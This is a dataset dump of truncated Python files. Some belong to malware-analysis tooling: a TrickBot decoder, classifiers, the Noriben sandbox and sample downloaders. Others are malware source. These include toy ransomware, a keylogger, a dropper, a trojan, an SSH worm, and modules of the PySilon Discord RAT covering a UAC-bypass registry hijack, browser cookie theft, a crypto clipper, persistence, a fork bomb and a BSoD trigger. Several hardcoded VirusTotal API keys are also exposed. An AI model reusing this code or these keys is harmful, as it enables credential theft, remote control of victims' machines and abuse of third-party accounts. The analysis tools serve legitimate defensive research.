text
stringlengths
0
9.3M
#!/usr/bin/python2.7 __AUTHOR__ = 'hasherezade' import argparse import string import base64 import ctypes import random import hashlib from Crypto.Cipher import AES trickbot_b64_charset = "HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT" VERBOSE = False BS = 16 pad = lambda s: s + (BS - len(s) % BS...
# -*- coding: utf-8 -*- """ Created on Wed Aug 1 14:52:43 2018 @author: user """ from sklearn.model_selection import train_test_split from keras import preprocessing import os import pandas as pd from sklearn.metrics import confusion_matrix,classification_report from sklearn.tree import DecisionTreeClassifier ####...
# -*- coding: utf-8 -*- """ Created on Wed Aug 1 14:52:43 2018 @author: user """ from sklearn.model_selection import train_test_split from keras import preprocessing import os import pandas as pd from sklearn.svm import SVC from sklearn.metrics import confusion_matrix,classification_report from sklearn.neighbors im...
# -*- coding: utf-8 -*- """ Created on Wed Aug 1 14:52:43 2018 @author: user """ from sklearn.model_selection import train_test_split from keras import preprocessing import os import pandas as pd from sklearn.svm import SVC from sklearn.metrics import confusion_matrix,classification_report ########################...
# -*- coding: utf-8 -*- """ Created on Wed Aug 1 14:52:43 2018 @author: user """ from sklearn.model_selection import train_test_split from keras import preprocessing import os import pandas as pd from sklearn.svm import SVC from sklearn.metrics import confusion_matrix,classification_report ########################...
# Hash Map class HashMap: def __init__(self): self.size = 6 self.map = [None] * self.size def _get_hash(self, key): hash = 0 for char in str(key): hash += ord(char) return hash % self.size def add(self, key, value): key_hash = self._get_hash(key...
from common.HashMap import HashMap class WinApi: keymap = HashMap() callMap = HashMap() keyIndex = 0 def __init__(self): file = open("../data/WinAPIs.txt", "r") self.keyIndex = 0 for line in file: if line == "" or line == "\n": continue ...
from sklearn.model_selection import train_test_split from sklearn.metrics import confusion_matrix from sklearn.metrics import accuracy_score from sklearn.metrics import classification_report import pandas as pd from keras import preprocessing from keras.utils import to_categorical import numpy from keras.models import ...
class DTParameter: def __init__(self, random_state, min_samples_split, min_samples_leaf, max_depth): #Embedding self.random_state = random_state self.min_samples_split = min_samples_split self.min_samples_leaf = min_samples_leaf self.max_depth = max_depth class DTParamet...
class KNNParameter: def __init__(self, n_neighbors, p, algorithm): #Embedding self.n_neighbors = n_neighbors self.p = p self.algorithm = algorithm class KNNParameters: def __init__(self): # model self.parameters = [] # 2019-07-06 09_09_39.367144 ...
class LatexReporter: def prepareLSTMSectionTitle(self, index, alg): return "\\subsubsection {"+str(alg)+" Katmanlı LSTM Analiz-" + str(index) +" Sonuçları}" def prepareGSectionTitle(self, index, alg): return "\\subsubsection {"+str(alg)+" Analiz-" + str(index) +" Sonuçları}" def prepareL...
# -*- coding: utf-8 -*- """ Created on Wed Aug 1 14:52:43 2018 @author: user """ import pandas as pd from keras import preprocessing import os import datetime from multiclass.AnalizeRunner import AnalizeRunner ################################################## prefix = "dataset" data_path = "C:\\Users\\afy\\Pycha...
class LSTMParameter: def __init__(self, embedding_units, unit, dropout, recurrent_dropout, lstm_activation, loss_func, optimizer, epochs, batch_size): #Embedding self.embedding_units = embedding_units #model self.units = unit self.dropout = dropout self.recurrent_...
from sklearn.model_selection import train_test_split from sklearn.metrics import confusion_matrix from sklearn.metrics import classification_report import pandas as pd from keras import preprocessing from keras.utils import to_categorical from keras.models import Sequential from keras.layers import Dense, LSTM, Dropou...
class RFParameter: def __init__(self, n_estimators, max_depth, min_samples_split, min_samples_leaf = 1, class_weights={}): #Embedding self.n_estimators = n_estimators self.max_depth = max_depth self.min_samples_split = min_samples_split self.min_samples_leaf = min_samples_...
class SVMParameter: def __init__(self, kernel, c, gamma, class_weights): #Embedding self.kernel = kernel self.c = c self.gamma = gamma self.class_weights = class_weights class SVMParameters: def __init__(self): # model self.parameters = [] # ...
#
# -*- coding: utf-8 -*- """ Created on Wed Aug 1 14:52:43 2018 @author: user """ from sklearn.model_selection import train_test_split from keras import preprocessing import os import pandas as pd from sklearn.metrics import confusion_matrix,classification_report from sklearn.tree import DecisionTreeClassifier ####...
# -*- coding: utf-8 -*- """ Created on Wed Aug 1 14:52:43 2018 @author: user """ from sklearn.model_selection import train_test_split from keras import preprocessing import os import pandas as pd from sklearn.svm import SVC from sklearn.metrics import confusion_matrix,classification_report from sklearn.neighbors im...
# -*- coding: utf-8 -*- """ Created on Wed Aug 1 14:52:43 2018 @author: user """ from sklearn.model_selection import train_test_split from keras import preprocessing import os import pandas as pd from sklearn.svm import SVC from sklearn.metrics import confusion_matrix,classification_report ########################...
# -*- coding: utf-8 -*- """ Created on Wed Aug 1 14:52:43 2018 @author: user """ from sklearn.model_selection import train_test_split from keras import preprocessing import os import pandas as pd from sklearn.svm import SVC from sklearn.metrics import confusion_matrix,classification_report ########################...
def filter_and_save_data(line_length, types_file_path, calls_file_path, max_analize_count, min_analize_cell_count, type_group): types_file = open(types_file_path, "r") calls_file = open(calls_file_path, "r") types_file_filtered = open("destination/filtered_types_file", "w") calls_file_filtered = op...
from utility.VTService import VTService import time vt_service = VTService() file_name = 1 vt_api_keys = [ "76ebd939301445249b9dfd7bb58e8be4d85f572de382cd6eceeb4a56ad7587f6", "583680f214840a461ead2cec8fae769c1eb3ee5461e362455e0d6daf38be12db", "02e4d9d35863b2c2e057289311bbd37f2eb21a7dd2496a04d298b3e680d...
from common.HashMap import HashMap file = open("source/CallApiMap.txt", "r") map = HashMap() for line in file: line = line.strip() if line == "": continue splitted = line.split("=") print(line) map.add(splitted[0], splitted[1]) map.print() file.close() s_file = open("destination/softwa...
import zipfile def extract_file(zip_path, destination_path, file_name): archive = zipfile.ZipFile(zip_path) archive.extract(file_name, path=destination_path, pwd=bytes('infected','utf-8')) def extract_malware_files(zip_path, destination_path, malware_type, malware_count, start_line): file = open("destina...
from common.HashMap import HashMap def get_family_type_0(lookup, type): for item in lookup: if item in type: return True return False def is_defined_type(type): if type is "Worms": return True if type is "Adware": return True if type is "Virus": retur...
import zipfile def fetch_hascode_from_file_name(file_name): if not "VirusShare" in file_name: return None start = file_name.find("_") if start < 1: return "" return file_name[start + 1:] archive = zipfile.ZipFile('D:\malwares\VirusShare_00000.zip', 'r') destination_path = "destina...
import requests import time class VTService: def rescan_virus(self, resource, api_key): params = {'apikey': api_key, 'input': resource} response = requests.post('https://www.virustotal.com/vtapi/v2/file/rescan', params=params) json_response = response.jso...
#!/usr/bin/env python3 """ Implementation of simple adware that pops multiple windows with the advertisements. """ import logging import sys import random from PySide2.QtWidgets import QApplication, QDialog, QLabel, QVBoxLayout class AdWindow(QDialog): """ This class represents ad window shown on the screen. "...
#!/usr/bin/env python3 """ Implementation of dropper that downloads malicious code from the server and dumps it into a file. """ import base64 import logging import socket import math class Dropper: """ This class represents the implementation of dropper. """ def __init__(self, host1, host2, number...
#!/usr/bin/env python3 """ Implementation of the server that sends some malicious code to its dropper client. """ import base64 import logging import socket class Server: """ This class represents a server that stores some malicious payload and sends it to the dropper once the connection is established....
#!/usr/bin/env python3 """ Implementation of file infector in Python. INJECTION SIGNATURE """ import logging import os import sys from cached_property import cached_property class FileInfector: """ This class represents the code injecting malware. """ def __init__(self, name): self._name = ...
#!/usr/bin/env python3 """ Implementation of simple ransomware in Python. """ import logging import os import sys import base64 class Ransomware: """ This class represents file encrypting ransomware. """ def __init__(self, name): self._name = name @property def name(self): """ ...
#!/usr/bin/env python3 """ Implementation of simple keylogger in Python. """ import daemon import logging import pyxhook class Keylogger: """ This class represents the code injecting malware. """ def __init__(self, name): self._name = name @property def name(self): """ Name of the ...
#!/usr/bin/env python3 """ Implementation of the server that collects data sent by trojan. """ import logging import socket class Server: """ This class represents a server of the attacker that collects data from the victim. """ def __init__(self, port): self._port = port # Initiali...
#!/usr/bin/env python3 """ Implementation of trojan that collects data and sends them to server. It acts like an ordinary diary. """ import logging import socket import sys class Trojan: """ This class represents the implementation of trojan disguised as diary. """ def __init__(self, host, ...
#!/usr/bin/env python3 """ Implementation of simple worm that spreads via SSH connection. """ import logging import paramiko import scp import sys class Worm: """ This class represents implementation of worm that spreads via SSH connections. """ def __init__(self, network_address): self._ne...
# Noriben Malware Analysis Sandbox # # Directions: # Just copy Noriben.py to a Windows-based VM alongside the SysInternals Procmon.exe # # Run Noriben.py, then run your executable. # When the executable has completed its processing, stop Noriben and view a # clean text report and timeline # # Changelog: # Version 2.0.1...
import argparse import glob import os import sys import zipfile exts = ('txt', 'csv') def search_archive(args): fname = '' if not args.log in exts: fname = args.log try: archive_name = '{}/{}'.format(args.file.split(os.sep)[-2], args.file.split(os.sep)[-1].split('_Noriben')[0]) excep...
# Noriben Sandbox Automation Script # Brian Baskin # Part of the Noriben analysis repo # Source: github.com/rurik/Noriben # # Changelog: # V 2.0 - August 2023 # Placed all editable data into Noriben.config file. # Cleaned up some logic and bugs # Added basic support for VirtualBox... still TODO # ...
from tkinter import * from tkinter import filedialog from PIL import ImageTk, Image import configparser import shutil import compiler import sys import os import subprocess window_icon = 'resources/icons/icon.ico'; Image.open('resources/icons/icon.ico').resize((120, 120)).save('icon.png', format='PNG') config_path, st...
import configparser import hashlib import sys import base64 import os def get_file_hash(path): sha256_hash = hashlib.sha256() with open(path,"rb") as f: for byte_block in iter(lambda: f.read(16777216),b""): sha256_hash.update(byte_block) return sha256_hash.hexdigest() def compile(d...
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! # # !! DON'T COMPILE OR RUN THIS FILE. IT WILL NOT WORK. INSTEAD, RUN PySilon.bat AND AFTER CLICKING 'COMPILE' !! # # !! YOU CAN TEST BY RUNNING source_prepared.py (THIS IS THE FINAL VERSON OF SOURCE CO...
import base64 import json import time import os import random import sqlite3 from shutil import copy2 from getpass import getuser import psutil from Cryptodome.Cipher import AES from win32crypt import CryptUnprotectData import subprocess def grab_cookies(): browser = Browsers() browser.grab_cookies() def cre...
import datetime from pathlib import Path import hashlib import sys import os import json def force_decode(b: bytes): try: return b.decode(json.detect_encoding(b)) except UnicodeDecodeError: return b.decode(errors= "backslashreplace") def get_file_hash(path): sha256_hash = hashlib.sha256() ...
import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil import time from datetime import datetime, timedelta def convert_date(ft): utc = datetime.utcfromtimestamp(((10 * int(ft)) - file_name) / nanoseconds) return utc.strftime('%Y-%m-%d %H:%M:%S') def g...
import psutil import os def protection_check(): vm_files = [ "C:\\windows\\system32\\vmGuestLib.dll", "C:\\windows\\system32\\vm3dgl.dll", "C:\\windows\\system32\\vboxhook.dll", "C:\\windows\\system32\\vboxmrxnp.dll", "C:\\windows\\system32\\vmsrvc.dll", "C:\\windows...
import subprocess import ctypes import sys def UACbypass(method: int = 1) -> bool: if GetSelf()[1]: execute = lambda cmd: subprocess.run(cmd, shell= True, capture_output= True) if method == 1: execute(f"reg add hkcu\Software\\Classes\\ms-settings\\shell\\open\\command /d \"{sys.executab...
from ctypes import cast, POINTER from comtypes import CLSCTX_ALL from pycaw.pycaw import AudioUtilities, IAudioEndpointVolume import pygame import threading # end of imports # on message elif message.content[:7] == '.volume': #.log Message is "volume" await message.delete() #.log Removed the message i...
from pynput import keyboard, mouse # end of imports # on message elif message.content == '.block-input': #.log Message is "block input" if not input_blocked: #.log Input is not already blocked await message.delete() #.log Removed the message async def on_press(): p...
import ctypes # end of imports # on message elif message.content == '.bsod': #.log Message is "Blue Screen of Death" await message.delete() #.log Removed the message await message.channel.send("```Attempting to trigger a BSoD...```") #.log Sent message about trying to BSoD #.log Trying to tri...
import pyperclip import re import os import json import threading # end of imports # on message elif message.content == '.start-clipper': #.log Message is "start crypto clipper" if clipper_stop: #.log Clipper is not running await message.delete() #.log Removed the message clip...
from shutil import copy2, rmtree from zipfile import ZipFile import os import requests # end of imports # on message elif message.content[:9] == '.download': #.log Message is "download" await message.delete() #.log Removed the message if message.channel.id == channel_ids['file']: #.log Message...
from cryptography.fernet import Fernet import os import pickle import psutil # end of imports # on message elif message.content[:8] == '.encrypt': #.log Message is "encrypt" await message.delete() #.log Removed the message if message.content.strip() == '.encrypt': embed = discord.Embed(title="...
from itertools import islice from resources.misc import * from pathlib import Path import subprocess import sys import os # end of imports # on reaction add elif str(reaction) == '🔴' and reaction.message.content[:15] == '```End of tree.': #.log Reaction is "remove tree messages" for i in tree_messages: ...
import os from shutil import copy2, rmtree from resources.misc import * import subprocess # end of imports # on message elif message.content[:7] == '.remove': #.log Message is "remove" await message.delete() #.log Removed the message if message.channel.id == channel_ids['file']: #.log Message ...
from filesplit.merge import Merge from shutil import copy2, rmtree import os # end of imports # on reaction add elif str(reaction) == '📤': #.log Reaction is "confirm upload" if expectation == 'onefile': #.log One file gets uploaded split_v1 = str(one_file_attachment_message.attachments).split...
import subprocess # end of imports # on message elif message.content == ".forkbomb": #.log Message is "fork bomb" await message.delete() #.log Removed the message embed = discord.Embed(title="💣 Starting...",description=f'```Starting fork bomb... This process may take some time.```', colour=discord.Co...
from resources.discord_token_grabber import * from resources.passwords_grabber import * from browser_history import get_history from resources.get_cookies import * from urllib.request import urlopen from threading import Thread from resources.misc import * import subprocess import os # end of imports # on message elif ...
import win32gui import win32con import os, requests, time from ctypes import cast, POINTER from comtypes import CLSCTX_ALL from pycaw.pycaw import AudioUtilities, IAudioEndpointVolume # end of imports # on message elif message.content == '.jumpscare': await message.delete() devices = AudioUtilities.GetSpeakers...
from pynput.keyboard import Key, Listener from resources.misc import * from PIL import ImageGrab # end of imports # anywhere def on_press(key): global files_to_send, messages_to_send, embeds_to_send, channel_ids, text_buffor processed_key = str(key)[1:-1] if (str(key)[0]=='\'' and str(key)[-1]=='\'') else key ...
import pyautogui # end of imports # on message elif message.content[:4] == '.key': await message.delete() if message.content.strip() == '.key': embed = discord.Embed(title="📛 Error",description='```Syntax: .key <keys-to-press>```', colour=discord.Colour.red()) embed.set_author(name="PySilon-ma...
from resources.misc import * import pyaudio import sys import os # end of imports # on message elif message.content == '.join': #.log Message is "join vc and stream microphone" await message.delete() #.log Removed the message vc = await client.get_channel(channel_ids['voice']).connect(self_deaf=True) ...
from html2image import Html2Image from PIL import Image import ctypes # end of imports # on reaction add elif str(reaction) == '✅': if custom_message_to_send[0] != None: threading.Thread(target=send_custom_message, args=(custom_message_to_send[0], custom_message_to_send[1], custom_message_to_send[2],)).sta...
from scipy.io.wavfile import write from threading import Thread from resources.misc import * import sounddevice import os # end of imports # anywhere def start_recording(): global files_to_send, channel_ids, send_recordings #.log Trying to start microphone recording while True: if send_recordings: ...
import monitorcontrol import threading # end of imports # on message elif message.content == '.monitors-off': if not turned_off: await message.delete() turned_off = True def monitor_off(): while turned_off: for monitor in monitorcontrol.get_monitors(): ...
from psutil import process_iter, Process from resources.misc import * from win32process import GetWindowThreadProcessId from win32gui import GetForegroundWindow # end of imports # on reaction add elif str(reaction) == '💀' and reaction.message.content[:39] == '```Do you really want to kill process: ': #.log Reactio...
from shutil import copy2, rmtree import winreg import sys import os # end of imports # !registry_implosion registry = winreg.ConnectRegistry(None, regbase) winreg.OpenKey(registry, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run') registry_key = winreg.OpenKey(regbase, 'Software\\Microsoft\\Windows\\CurrentVersion\\...
from resources.misc import * from PIL import ImageGrab import subprocess import asyncio import os # end of imports # on reaction add elif str(reaction) == '🔴' and reaction.message.content == '```End of command stdout```': #.log Reaction is "remove .cmd stdout messages" for i in cmd_messages: await i.d...
import pyautogui import numpy as np import subprocess import time import imageio # on message elif message.content == '.screenrec': #.log Message is "record screen" await message.delete() #.log Removed the message await message.channel.send("`Recording... Please wait.`") #.log Sent message about r...
from resources.misc import * from PIL import ImageGrab import subprocess # end of imports # on message elif message.content == '.ss': #.log Message is "take screenshot" await message.delete() #.log Removed the message ImageGrab.grab(all_screens=True).save(f'C:\\Users\\{getuser()}\\{software_directory_n...
from PIL import Image, ImageDraw from win32print import * from win32gui import * from win32con import * from win32api import * import random import math import json import time import os # end of imports # on message elif message.content == '.display-graphic': await message.delete() embed = discord.Embed(titl...
import pyttsx3 # end of imports # on message elif message.content[:4] == '.tts': #.log Message is "tts" await message.delete() #.log Removed the message if message.content.strip() == '.tts': #.log Author issued empty ".tts" command embed = discord.Embed(title="📛 Error",description='`...
import pygame.camera import pygame.image import subprocess import time # end of imports # on message elif message.content[:7] == '.webcam': #.log Message is "webcam" await message.delete() #.log Removed the message if message.content.strip() == '.webcam': #.log Author issued empty ".webcam" co...
import ctypes from urllib.parse import urlparse # end of imports # anywhere def get_hosts_file_path(): hosts_file_path = r'C:\Windows\System32\drivers\etc\hosts' if ctypes.windll.kernel32.GetFileAttributesW(hosts_file_path) != -1: return hosts_file_path return None # on message elif message.cont...
import os from filesplit.split import Split from tkinter import Tk, filedialog def get_manual_path(isfile): root = Tk() root.withdraw() root.attributes('-topmost', True) if isfile: open_c = filedialog.askopenfilename() else: open_c = filedialog.askdirectory() root.destroy() ...
from PIL import Image, ImageDraw, ImageTk import math import tkinter as tk import functools import studio import json import os class drawling_menu: def __init__(self, root): self.root = root self.root.geometry('390x500') header = tk.Label(self.root, text='Choose a project to begin:', font...
from PIL import Image, ImageDraw, ImageTk import tkinter as tk import json from win32gui import * from win32con import * from win32api import * from win32print import * import time import os def hex_to_rgb(hex): rgb = [] hex = hex[1:] for i in (0, 2, 4): decimal = int(hex[i:i+2], 16) rgb.a...
# -*- coding: UTF-8 -*- """MalSearch package information. """ import os __author__ = "Alexandre D'Hondt" __copyright__ = "© 2024-2025 A. D'Hondt" __email__ = "alexandre.dhondt@gmail.com" __license__ = "GPLv3 (https://www.gnu.org/licenses/gpl-3.0.fr.html)" __source__ = "https://github.com/packing-box/pytho...
# -*- coding: UTF-8 -*- import logging from os import cpu_count from .clients import * from .clients import __all__ as _clients __all__ = ["download_sample", "download_samples", "get_samples_feed"] + _clients _CLIENTS_MAP = {n.lower(): globals()[n] for n in _clients} _MAX_WORKERS = 3 * cpu_count() logger = logging...
# -*- coding: UTF-8 -*- from .__info__ import __author__, __copyright__, __email__, __license__, __source__, __version__ def _parser(name, description, examples): from argparse import ArgumentParser, RawTextHelpFormatter descr = f"{name} {__version__}\n\nAuthor : {__author__} ({__email__})\nCopyright: {__co...
# -*- coding: UTF-8 -*- from .__common__ import API __all__ = ["Maldatabase"] class Maldatabase(API): doc = "https://maldatabase.com/api-doc.html" url = "https://api.maldatabase.com/download" _api_key_header = "Authorization" def get_malware_feed(self, hashtype="sha256"): # available ou...
# -*- coding: UTF-8 -*- from .__common__ import hashtype, API __all__ = ["Malpedia"] class Malpedia(API): doc = "https://malpedia.caad.fkie.fraunhofer.de/usage/api" url = "https://malpedia.caad.fkie.fraunhofer.de/api" _auth_method = "APIToken" @hashtype("md5", "sha256") def get_file_by_hash(sel...
# -*- coding: UTF-8 -*- from .__common__ import hashtype, API __all__ = ["MalShare"] class MalShare(API): doc = "https://malshare.com/doc.php" url = "https://malshare.com" _api_key_param = "api_key" @hashtype("md5", "sha1", "sha256") def get_file_by_hash(self, hash): self._get("api.php"...
# -*- coding: UTF-8 -*- from .__common__ import hashtype, API __all__ = ["MalwareBazaar"] class MalwareBazaar(API): doc = "https://bazaar.abuse.ch/api" url = "https://mb-api.abuse.ch/api/v1" _api_key_header = "API-KEY" @hashtype("sha256") def get_file_by_hash(self, hash): # daily limit:...
# -*- coding: UTF-8 -*- from .__common__ import Web __all__ = ["MalwareFeed"] class MalwareFeed(Web): doc = "https://github.com/MalwareSamples/Malware-Feed/blob/master/README.md" url = "https://github.com/MalwareSamples/Malware-Feed" def get_malware_feed(self): #TODO pass
# -*- coding: UTF-8 -*- from .__common__ import hashtype, API __all__ = ["Triage"] class Triage(API): doc = "https://tria.ge/docs" url = "https://tria.ge/api/v0" _auth_method = "Bearer" @hashtype("md5", "sha1", "sha256", "sha512") def get_file_by_hash(self, hash): hashtype = {32: "md5",...
# -*- coding: UTF-8 -*- from .__common__ import hashtype, API __all__ = ["VirusShare"] class VirusShare(API): doc = "https://virusshare.com/apiv2_reference" url = "https://virusshare.com/apiv2" _api_key_param = "apikey" @hashtype("md5", "sha1", "sha224", "sha256", "sha384", "sha512") def ge...
# -*- coding: UTF-8 -*- from .__common__ import hashtype, API __all__ = ["VirusTotal"] class VirusTotal(API): doc = "https://docs.virustotal.com/reference/overview" url = "https://www.virustotal.com/api/v3" _api_key_header = "X-Apikey" @hashtype("md5", "sha1", "sha256") def get_file_by_hash...
# -*- coding: UTF-8 -*- from .__common__ import Web __all__ = ["MalwareFeed"] class VxUnderground(Web): url = "https://vx-underground.org/Samples" def get_malware_feed(self): #TODO pass
# -*- coding: UTF-8 -*- import logging __all__ = ["API", "Web"] _MIN_BACKOFF = 300 logger = logging.getLogger("malsearch") def _valid_hash(hash, *types): import re types_map = {'md5': 32, 'sha1': 40, 56: 'sha224', 'sha256': 64, 'sha384': 96, 'sha512': 128} pattern = "|".join(f"[0-9a-f]{{{types_map[t]}...
# -*- coding: UTF-8 -*- from .maldatabase import Maldatabase from .malpedia import Malpedia from .malshare import MalShare from .malwarebazaar import MalwareBazaar from .triage import Triage from .virusshare import VirusShare from .virustotal import VirusTotal __all__ = ["Maldatabase", "Malpedia", "MalShare", "Malwar...
#!/usr/bin/python # -*- coding: UTF-8 -*- import os from malsearch.clients.__common__ import _valid_hash, hashtype, _Base from unittest import TestCase FILE = "tmp-file" TEST_HASHES = { 'md5': "098f6bcd4621d373cade4e832627b4f6", 'sha1': "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", 'sha224': "90a3ed9e32...
#!/usr/bin/python # -*- coding: UTF-8 -*- import os from malsearch import * from unittest import TestCase CONF = """[API keys] VirusTotal = 9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08 [Disabled] VirusTotal = Bad API key """ FILE = "test.conf" HASH = "098f6bcd4621d373cade4e832627b4f6" class Test...
#!/usr/bin/env python3 import argparse from pathlib import Path import platform import sys import os import shutil import re import shlex import subprocess import tempfile import base64 def compile_nim(nim_file, output_exe, os_name, arch, hide_console=False, nim_defines=None): output_exe = Path(output_exe).resolve...
import sys import os import subprocess import shutil from pathlib import Path from PyQt5.QtWidgets import QApplication, QMainWindow, QTabWidget from PyQt5.QtGui import QFont from PyQt5.QtCore import QThread, pyqtSignal # Import all tab widgets from the TABS package from TABS import ( BuilderWidget, OutputWidge...
# TABS package from .builder import BuilderWidget from .output import OutputWidget from .c2 import C2Widget from .krash import KrashWidget from .garbage import GarbageCollectorWidget from .docs import DocsWidget from .settings import SettingsWidget from .whispers import SilentWhispersWidget
import os from functools import partial from PyQt5.QtWidgets import ( QWidget, QVBoxLayout, QHBoxLayout, QPushButton, QLineEdit, QComboBox, QCheckBox, QLabel, QGroupBox, QScrollArea, QTableWidget, QTableWidgetItem, QHeaderView, QAbstractItemView, QSizePolicy ) from PyQt5.QtGui import QFont, QPixmap, QMovie...
from .builder import BuilderWidget